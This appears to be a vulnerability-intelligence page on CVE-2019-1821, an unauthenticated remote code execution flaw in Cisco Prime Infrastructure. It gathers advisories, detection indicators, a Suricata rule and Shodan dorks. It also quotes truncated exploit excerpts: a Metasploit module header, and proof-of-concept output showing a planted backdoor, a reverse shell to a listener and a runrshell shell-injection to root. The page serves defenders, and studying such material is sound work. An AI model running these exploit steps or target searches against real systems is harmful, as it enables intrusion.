CVE-2019-1821
published 2019-05-16CVE-2019-1821: A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an…
PriorityP193critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
98.09%
99.9th percentile
A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_prime_infrastructure | — | — |
| cisco | evolved_programmable_network_manager | < 3.0.1 | 3.0.1 |
| cisco | network_level_service | — | — |
| cisco | prime_infrastructure | < 3.4.1 | 3.4.1 |
| cisco | prime_infrastructure_and_evolved_programmable_network_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit attempts by monitoring POST requests to /servlet/UploadServlet on port 8082 with the specific exploit headers: Destination-Dir: tftpRoot, Compressed-Archive: false, Primary-IP: 127.0.0.1 ↗
- →Alert on HTTP POST to /servlet/UploadServlet containing a tar file with path traversal sequences (../../) in tar entry names, indicating directory traversal exploitation attempt ↗
- →Monitor for new .jsp files appearing under /opt/CSCOlumos/tomcat/webapps/ROOT/ or apache-tomcat-8.5.16/webapps/ROOT/ as indicators of successful webshell deployment ↗
- →Use Shodan/FOFA/Google dorks to identify exposed Cisco Prime Infrastructure instances: http.title:"prime infrastructure" / title="prime infrastructure" / intitle:"prime infrastructure" ↗
- →Fingerprint Cisco Prime Infrastructure by checking for HTTP response header 'Server: Prime' on the login page /webacs/pages/common/login.jsp returning HTTP 200 ↗
- →Detect privilege escalation post-exploitation via execution of /opt/CSCOlumos/bin/runrshell with shell injection argument pattern '" && /bin/sh #' ↗
- →Nuclei template detection: POST to /servlet/UploadServlet with tar containing path traversal to ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt, then GET /test.txt and verify randstr in response body with HTTP 200 ↗
- ·CVE-2019-1821 is exploitable WITHOUT authentication (unauthenticated RCE), targeting the HA Health Monitor component on port 8082, not the standard web management port 443 ↗
- ·The Metasploit module targets Cisco Prime Infrastructure 3.4.0.0 specifically; the exploit port for UploadServlet is 8082 (SSL), while the web interface check uses port 443 ↗
- ·CVE-2019-1821 differs from CVE-2019-1822 and CVE-2019-1823 in that it requires no authentication; the latter two require valid credentials to the administrative interface ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck8.8HIGH
vendor_cisco8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
vendor_cisco·2019-05-15·CVSS 8.8
CVE-2019-1821 [HIGH] CWE-20 Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.
One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.
The second and third issues, CVE-2019-1822 and CVE-2019-1823, require that an attacker have valid credentials to authenticate to the impacted administrative interface.
These vulnerabilities exist because the software improperly validates user-supplied
Cisco
Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-1822 Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
CVE-2019-1822: Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system. One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface. The second and third issues, CVE-2019-1822 and CVE-2019-1823, require that an attacker have valid credentials to authenticate to the impacted administrative interface. These vulnerabilities exist because the software improperly validates use
Cisco
Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-1823 Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
CVE-2019-1823: Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system. One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface. The second and third issues, CVE-2019-1822 and CVE-2019-1823, require that an attacker have valid credentials to authenticate to the impacted administrative interface. These vulnerabilities exist because the software improperly validates use
Cisco
Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-1821 Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
CVE-2019-1821: Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities
Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system. One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface. The second and third issues, CVE-2019-1822 and CVE-2019-1823, require that an attacker have valid credentials to authenticate to the impacted administrative interface. These vulnerabilities exist because the software improperly validates use
GHSA
GHSA-4mx6-fjqc-4rhr: A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could al
ghsa_unreviewed·2022-05-24
CVE-2019-1821 [CRITICAL] CWE-20 GHSA-4mx6-fjqc-4rhr: A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could al
A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
VulnCheck
Cisco evolved_programmable_network_manager Improper Input Validation
vulncheck·2019·CVSS 8.8
CVE-2019-1821 [HIGH] Cisco evolved_programmable_network_manager Improper Input Validation
Cisco evolved_programmable_network_manager Improper Input Validation
A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
Affected: Cisco evolved_programmable_network_manager
Required Action: Apply remediations or mitigations per vendor instructions or disco
Suricata
ET WEB_SPECIFIC_APPS Cisco Prime Infrastruture RCE - CVE-2019-1821
suricata·2019-05-20·CVSS 8.8
CVE-2019-1821 [HIGH] ET WEB_SPECIFIC_APPS Cisco Prime Infrastruture RCE - CVE-2019-1821
ET WEB_SPECIFIC_APPS Cisco Prime Infrastruture RCE - CVE-2019-1821
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Cisco Prime Infrastruture RCE - CVE-2019-1821"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/servlet/UploadServlet"; startswith; endswith; fast_pattern; http.header; header_lowercase; content:"destination-dir|3a 20|tftpRoot"; http.request_body; content:"String(|22|/bin/"; content:"new Socket(|22|"; distance:0; content:"Runtime.getRuntime().exec("; distance:0; http.content_type; content:"multipart/form-data|3b|"; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce; classtype:web-applicatio
Exploit-DB
Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)
exploitdb·2019-06-20
CVE-2019-1821 Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)
Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that
the TarArchive Java class the HA Health Monitor component uses does not check for any
directory traversals while unpacking a Tar file, which can be abused by a remote user to
leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps
directory, and gain arbitrary remote code execution. Note that authentication
Exploit-DB
Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution
exploitdb·2019-05-17·CVSS 8.8
CVE-2019-1821 [HIGH] Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution
Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution
---
#!/usr/bin/python
"""
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
Steven Seeley (mr_me) of Source Incite - 2019
SRC: SRC-2019-0034
CVE: CVE-2019-1821
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/
Metasploit
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
metasploit
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability.
Nuclei
Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-1821 [CRITICAL] Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
Template:
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
author: _0xf4n9x_
severit
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153350/Cisco-Prime-Infrastructure-Health-Monitor-TarArchive-Directory-Traversal.htmlhttp://www.securityfocus.com/bid/108339https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rcehttp://packetstormsecurity.com/files/153350/Cisco-Prime-Infrastructure-Health-Monitor-TarArchive-Directory-Traversal.htmlhttp://www.securityfocus.com/bid/108339https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
2019-05-16
Published
Exploited in the wild